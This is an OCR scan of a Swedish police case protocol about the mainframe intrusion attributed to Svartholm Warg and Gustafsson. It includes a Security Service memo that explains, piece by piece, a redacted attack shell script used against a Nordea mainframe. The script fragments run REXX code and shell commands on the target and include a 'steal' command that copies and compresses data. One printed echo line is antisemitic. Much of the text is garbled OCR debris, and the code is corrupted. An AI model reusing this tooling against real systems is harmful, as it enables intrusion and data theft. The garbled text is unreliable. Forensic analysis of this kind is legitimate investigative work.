Professional Documents
Culture Documents
Stockholms ln
Enhet
LU/IT !T-forensisk sektion
Handlggare (Protokollfrare)
Kriminalinspektr Olle Wahlstrm
Underskningsledare
Kammarklagare Henrik Olin
Polisens diarienummer
0201-K81864-12
Tillggsprotokoll
till 0201-K81864-12
Aklnr
AM-52124-12
Signerat av
Signerat datum
Datum
2013-04-18
Frtursml l Beslag Mlsgande vill bli underrttad om tidpunkt fr huvudfrhandlingen
Nej Nej
Ersttningsyrkanden Tolk krvs
Misstnkt {Efernamn och frnamn) Personnummer
Svartholm W arg, Per Gottfrid 19841017-0537
Brott
Underrttelse om utredning enligt RB 23:18 Underrttelse Yttrande Underrttelse
Underrttelsestt, misstnkt utsnd senast slutfrd
Frsvarare
Salomonson, Ola, frordnad 2012-09-13
Underrttelsestt, frsvarare Resultat av underrttelse mt l Resultat av underrttelse frsv
Misstnkt (Efernamn och frnamn) Personnummer
Gustafsson, Bror OlofMathias 197 61117-7234
Brott
Underrttelse om utredning enligt RB 23:18 Underrttelse Yttrande Underrttelse
Underrttelsestt, misstnkt utsnd senast slutfrd
Frsvarare
Begrd, Hurtig, Bjr
Underrttelsestt, frsvarare Resultat av underrttelse mi l Resultat av underrttelse frsv
Utredningsuppgifer/Redovisningshandlingar
Diarienr Uppgifstyp Sida
Tillggsprotokoll 2
Rapport Rikspolisstyrelsen
0201-K81864-12 Rapport Sammanfattning konsekvenser Rikspolisstyrelsen ................................. l
PM
PMGllande kommunikation ............................................................................... 4
PMsammanfattning av innehll i e-post.. ........................................................... 7
PMAnalys av flen utcam.sh e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e e 13
Film
U
0
3
3
0
I
0
::
I
I
C
0
<
I
I
O
I
0
O
X
O
U
N
C
...
L
C
-
...
O
...
C
|
L
...
C
N
C
m
P
O
...
O
O
-
...
N
|
\
(
(
(
borlngeO l.pg
Rg /Or /Peronnr l K0rkon l cbassin:
sokn:nq
Foronsinnehav
saluvagnsinnehav
Huvudkontr / flil
AdNsser
O OO
kre 699000-4068
POLISMYNDJGHETEN DALRNA
BOX 739 /NPO OMR.BORLNGE
79129 FALUN
LKF: 208000 krkteor|: staten
Antal hmtade fordon: 1
Fordonsslag
PcrsOnDI`
SLAP
Antal
I
status
trI<
rsm.
1VO
1VV
1
1
9
9
O
b
Antal garroll
1
Fordonsslag
PcrsOnDI`
PcrsOnD`
SLAP
PcrsOnDI`
PcrsOnDI`
PcrsOnDI`
PcrsOnDI`
PcrsOnDI`
PcrsOnD`
PcrsOnD`
PersOnDI`
PersOnDI`
PcrsOnDI`
PcrsOnDI`
PcrsOnDI`
PcrsOnDI`
PcrsOnDI`
PersOnDI`
PersOnDI`
PcrsOnDI`
PcrsOnDI`
bctr|.c CO1vcrstion j J COnverstion
|`unt JPo Pint l i 0O.ume1t WOrdPd
Ny sknnQ Utskrt
Antal
status garroll
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
Nic`s CO1vcrstion J Q H|WyTc.hnO`O]y CO... l WindOnsNcsscnQcr
.
.
S
0
0
3
3
0
I
D
7
I
I
C
0
<
I
I
0
I
pO
0
X
O
N
C
.
L
.
O
C
|
L
C
N
C
.
O
.
O
O
.
N
(
(
falunO ljpg
Reg-/Or-/Peronnr j K0rkon j cbnssin:
sokmoq
I Foronsinnehav
saluvagnsinnehav
Huvudkontr l flial
Adrsser
OOO OO
kre 699000-4076
POLISMYNDIGHETEN DALRNA
BOX 739/NPO OMR. FALUN
79129 FALUN
LKF: 208000 krkteor|: Staten
Antal hmtade fordon: O
Ny UtSkriU
Fordonsslag Antal status Antal garroll Antal
0o1 c
l,tstartl
PcrsonDI` Avst` ` d 1
SLAP trI< 9V
N! b
LstDI 9
rsm. Fordonsslag
PcrsonDI`
PcrsonDI`
PcrsonDI`
1VV LstDI`
1V1 SLAP
V PcrsonDI`
V PcrsonDI`
1V9 N!
1V9 N
1V9 N!
1V9 N!
1VVV LstDI`
PcrsonDI`
1V9 SLAP
1VV SLAP
1V SLAP
PcrsonDI`
SLAP
1VVV PcrsonDI`
1Vb SLAP
Infobll- Mozllla FlrefoK bctrl.c Convcrst|on l J Convcrst|on
[ NcnNcssQc l l untk|cd P|nt ll 0o.umcnt WordPd
status garroll
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
trI<
l NI . ` s Convcrst|on
' l `1 homct
l H|WyTc.hno`oQy Co ... l - WIndonsNcsscnQcr
.
|
S
m
p
3
3
p
I
I
I
C
p
<
I
I
0
I
T
O
m
.
N
C
.
L
C
4
.
O
.
C
N
.
L
C
N
C
.
O
.
O
O
4
.
N
(
\
(
(
PM Analys av filen utcam.sh, 2013-04-18 14:32 diarienr: 0201-K81864-12
SKERH ETSPOLISEN
Informationsskerhetsenheten
Aal
y
s av flen utcam.sh
Bakgrund
PM
0atum
2013-04-18
0|ar|onr
Angriparen har successivt utveckat sina attackmetoder i syfte att strukturera och frenkla sitt
arbete. I beslag 2012-0201-BG25023-2.E01/Partition 7/ terfnns en fl med namnet "utcam.sh".
Nedan redovisas versiktligt innehllet i denna fl. Delar av flen har tagits bort fr att undvika
ondig exponering av lP-adresser, tilvgagngsstt och detaljer i utnyttjade srbarheter. Fr att
ka lsbarheten av skriptet har ocks tomma rader tagits bort och ngra extra radbrytningar
tillkommit.
Sammanfattning
Angriparen har skrivit ett verktyg fr att frenkla sina attacker. Verktyget r i form av ett s kallat
shell-skript med vars hjlp man enkelt kan vlja vilken server man ska angripa och vad man vill
stadkomma med attacken. Shell-skriptet utnyttjar en av de srbarheter som angriparen funnit
och r avancerat och vl strukturerat. Ett exempel p kommando som kan ges till skriptet r
"steal". Kommandot anvnds till exempel d man nskar stjla viss specifcerad information p
stordatorn.
1 3
1 (7
)
PM Analys av filen utcam.sh, 2013-04-18 14:32 diarienr: 0201-K81864-12
skerhetspolisen PM
2013-04-18
Aalys
Filen r vad man brukar benmna ett shell-skript1 Frenklat kan man beskriva ett shell-skript
som en serie kommandon man nskar att datorn ska utfra sekventiellt. I denna analys ges en
beskrivning av shell-skriptets funktion. Detta fr att skildra angriparens intention och kapacitet.
Beskrivningarna ges direkt efter utvalda kodsegment. Kodsegmenten fljer flens struktur frn
brjan till slut och som tidigare nmnts har delar av koden tagts bort. Delar av koden har ocks
frgmarkerats fr att tydliggra ngra viktiga delar.
#!/bin/bash
h=" IP-adress annan stordator"
Hgst upp i flen specifcerar angriparen ett antal lP-adresser. Dessa har i detta PM bytts ut mot
en beskrivande text. Om det r ett #-tecken fre en rad i ett shell-skript kommer denna rad inte
att lsas av skiptet. I stycket ovan ser vi att det r Nordeas stordator som angriparen valt att
angripa. Det r dock ltt gjort att ndra servet s att man i stllet angriper ett annat ml genom
att fytta #-tecknet.
' Frn engelskans shell script
Restructured Extended Executor, programmeringssprk utvecklat av IBM
1 4
2
(7)
PM Analys av filen utcam.sh, 2013-04-18 14:32 diarienr: 0201-K81864-12
skerhetspolisen PM
2013-04-18
" Mozilla/5.0 (Windows NT 5.1; x86) AppleWebKit/535.19 (KHTM, like
Gecko) Chrome/18.0.1025.168 Safari/535.19"
dh=" UT"
while :; do
echo -n " $dh 8====D "
Shell-skriptet fortstter med att defniera ett antal variabler samt att invnta ett kommando och
eventuellt annan data frn anvndaren. I resterande del av shell-skriptet kommer detta
kommando att ha lagrats i variabeln "verb". Verb kan sledes likstllas med valt kommando.
Shell-skriptet innehller en hel del sprutskrifter. Det r dessa man oftast ser efter kommandot
echo.
echo " << $cmdline"
if [ -z " $cmdline" ] ; then
f i
echo " FIN"
exit
'echo " $cmdline" lcut -d' ' -fl'
arg=' echo " $cmdline" l cut -d' ' -f2-'
cmd=" " ;
pro=" "
post=" "
tgt=" "
if [ ] ; then
/tmp/rx; " ;
f i
echo " : pPPpP REX ROX" >&2
pro=" echo '/* REX */' > /tmp/rx; echo '' >> /tmp/rx; chod 755
post=" rm -f /tmp/rx " ;
tgt=" "
cmd=" $arg"
Shell-skriptet defnierar hr det frsta mjliga kommandot "rx". Om angriparen valt att utfra
just kommandot rx r det p denna plats det bestms vad kommandot ska utfra. sekvensen av
instruktioner delas upp i olika delar: pro, post, tgt och cmd. Detta fr att enklare dela upp i vilken
ordning kommandona ska ske och fr att mer strukturerat stta ihop kommandot tl en helhet i
slutet av shell-skriptet. I just det hr fallet nskar angriparen kunna skriva och kra RX2-kod
p stordatorn.
Restructured Extended Executor, programmeringssprk utvecklat av IBM
1 5
3
(7)
PM Analys av filen utcam.sh, 2013-04-18 14:32 diarienr: 0201-K81864-12
skerhetspolisen PM
2013-04-18
if " $verb" = "
l ; then
echo " :pPPpP REX ROX OUT" >&2
f i
Hr nskar angriparen utfra samma sak som i exemplet ovan, men med den skillnaden att man
frvntar sig att RXX-kommandona producerar ngon form av utdata som man r intresserad
av.
if " $verb" = "
l ; then
echo " :pPPP REXOPHiLE" >&2
echo " [ $arg
l
"
inputfile='echo " $arg" lcut -d' ' -fl'
rest=' echo " $arg" l cut -d' ' -f2-'
cmd=' (echo -n " PAS='${rest}' ;" ; cat $inputfile)'
pro=" echo '/* REX */' > /tmp/rx; echo '1=\" \" ; say \" ok\"
; ' >> /tmp/rx; chiod 755 /tmp/rx; cat /tmp/rx;" ;
tgt=" "
f i
exit
D kommandot rxin anges, nskar angriparen kra RXX-kommandon som anges via en f som
ocks tillhandahlls av angriparen.
if [ " $verb" = " "
l; then
fi
echo " :pPPP REXOPHiLE" >&2
echo " [ $arg
l "
inputfile='echo " $arg" lcut -d' ' -fl'
rest='echo " $arg" lcut -d' ' -f2-'
cmd=' (echo -n " PAS='${rest}' ;" ; cat $inputfile)'
pro=" " ;
tgt=" "
Detta r en kombination av de tv tidigare beskrivna kommandona rxout och rxin.
if [ " $verb" = " "
l; then
f i
echo " :pPppPP SHELL SHOCK" >&2
tgt=" /bin/sh"
cmd=" $arg"
Syftet med kommandot sh r att kra ett kommando/program i USS
3
-delen (UNIX-delen) av
stordatorn. Til exempel kanske man r intresserad av hur katalogstrukturen ser ut eller vilka
processer som krs.
UNIX System Services, en komponent i z/OS som anvnds i IBM:s stordator
1 6
4
(7)
PM Analys av filen utcam.sh, 2013-04-18 14:32 diarienr: 0201-K81864-12
skerhetspolisen
if [ " $verb" l; then
echo " :PppPPP PHILE SHOCK" >&2
echo " [ $arg ] "
PM
2013-04-18
inputfile='echo " $arg" lcut -d' ' -fl'
cmd=$ (cat $inputfilelsed 's/\xOd//g')
f i
Kommandot shin gr samma sak som kommandot sh, men med skillnaden att man lser
instruktoner frn en angiven fl.
if [ " $verb" = " " l; then
echo " :PpppPP SHYLOCK THE JEWISH THIEF STEALiNG TO gl" >&2
cmd=" rm -fr /tmp/sl; cd /tmp; mkdir /tmp/sl; mkdir /tmp/sl/$arg; cp
-r \" //'$arg'\" /tmp/sl/$arg/; cat \" //'$arg'\" l -c >
/tmp/sl/${arg}.raw.z;
tgt=" "
echo " [ $cmd l "
f i
Kommandot "steal" r eventuellt sjlvfrklarande. Hr har angriparen fr avsikt att stjla ngot
som han sjlv anger. Shell-skriptet ser ocks tl att komprimera (acka ihop) informationen som
angriparen har valt att stjla, innan den lggs i en katalog p stordatorn som r mjlig fr
angriparen att komma t.
1 7
5 (7)
PM Analys av filen utcam.sh, 2013-04-18 14:32 diarienr: 0201-K81864-12
skerhetspolisen PM
2013-04-18
if [ " $verb" = 1 1 ] ; then
e eho " : PppPPp VOLU GOES TO 11" >&2
pro=" echo 1/* REXX */1 > /tmp/rx; echo 1address syscall \" read s
4096\" ;
tgt="